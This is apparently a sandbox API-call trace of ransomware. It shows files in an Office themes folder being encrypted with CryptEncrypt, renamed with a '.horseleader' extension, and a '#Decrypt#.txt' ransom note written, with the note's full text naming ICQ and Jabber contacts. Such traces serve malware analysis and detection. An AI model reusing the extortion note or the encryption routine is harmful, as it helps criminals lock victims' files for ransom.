[0247.187] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=99561) returned 1 [0247.187] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.187] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.190] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.190] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.190] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x9a74, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.191] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.191] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.191] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.191] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x134e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.191] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.192] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.192] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.192] CloseHandle (hObject=0x1a4) returned 1 [0247.192] GetProcessHeap () returned 0x780000 [0247.192] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.192] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM.horseleader") returned 89 [0247.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.elm.horseleader")) returned 1 [0247.193] GetProcessHeap () returned 0x780000 [0247.193] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.193] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x61cf3090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x225, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="INDUST.INF", cAlternateFileName="")) returned 1 [0247.193] lstrcmpiW (lpString1="INDUST.INF", lpString2="Windows") returned -1 [0247.193] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF") returned 77 [0247.194] StrStrIW (lpFirst="INDUST.INF", lpSrch=".horseleader") returned 0x0 [0247.194] lstrcmpW (lpString1="INDUST.INF", lpString2="#Decrypt#.txt") returned 1 [0247.194] lstrcmpW (lpString1="INDUST.INF", lpString2="_uninstalling_.png") returned 1 [0247.194] lstrlenW (lpString=".testttjffg") returned 11 [0247.194] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF", lpSrch=".testttjffg") returned 0x0 [0247.194] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.194] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.194] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.195] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF") returned 77 [0247.195] StrStrW (lpFirst="INDUST.INF", lpSrch=".txt") returned 0x0 [0247.195] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=549) returned 1 [0247.195] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x225, lpOverlapped=0x0) returned 1 [0247.197] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffddb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.197] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x225, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x225, lpOverlapped=0x0) returned 1 [0247.197] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.197] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.197] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.197] CloseHandle (hObject=0x1a4) returned 1 [0247.197] GetProcessHeap () returned 0x780000 [0247.197] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.197] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF.horseleader") returned 89 [0247.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\INDUST.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\indust.inf.horseleader")) returned 1 [0247.201] GetProcessHeap () returned 0x780000 [0247.201] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.201] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x143b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.201] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.201] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 78 [0247.201] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.201] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.201] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.201] lstrlenW (lpString=".testttjffg") returned 11 [0247.201] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.201] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.201] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.201] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.202] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 78 [0247.202] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.202] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=5179) returned 1 [0247.202] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x143b, lpOverlapped=0x0) returned 1 [0247.204] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffebc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.204] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x143b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x143b, lpOverlapped=0x0) returned 1 [0247.204] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.204] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.205] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.205] CloseHandle (hObject=0x1a4) returned 1 [0247.205] GetProcessHeap () returned 0x780000 [0247.205] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.205] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.horseleader") returned 90 [0247.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.horseleader")) returned 1 [0247.206] GetProcessHeap () returned 0x780000 [0247.206] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.206] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x8317, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.206] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.206] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 79 [0247.206] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.206] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.206] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.206] lstrlenW (lpString=".testttjffg") returned 11 [0247.206] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.206] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.206] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.207] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 79 [0247.207] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.207] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=33559) returned 1 [0247.207] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.209] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.210] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.210] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3317, lpOverlapped=0x0) returned 1 [0247.211] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffcce9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.211] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3317, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3317, lpOverlapped=0x0) returned 1 [0247.211] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.211] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.211] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.211] CloseHandle (hObject=0x1a4) returned 1 [0247.212] GetProcessHeap () returned 0x780000 [0247.212] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.212] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.horseleader") returned 91 [0247.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.horseleader")) returned 1 [0247.213] GetProcessHeap () returned 0x780000 [0247.213] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.213] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x8317, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.213] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.213] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\#Decrypt#.txt") returned 80 [0247.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.214] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.214] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.215] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.215] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.215] CloseHandle (hObject=0x158) returned 1 [0247.216] GetProcessHeap () returned 0x780000 [0247.216] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.217] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65d5e3f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IRIS", cAlternateFileName="")) returned 1 [0247.217] lstrcmpiW (lpString1="IRIS", lpString2="Windows") returned -1 [0247.217] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS") returned 64 [0247.217] lstrcmpW (lpString1="IRIS", lpString2=".") returned 1 [0247.217] lstrcmpW (lpString1="IRIS", lpString2="..") returned 1 [0247.217] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.217] GetProcessHeap () returned 0x780000 [0247.217] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 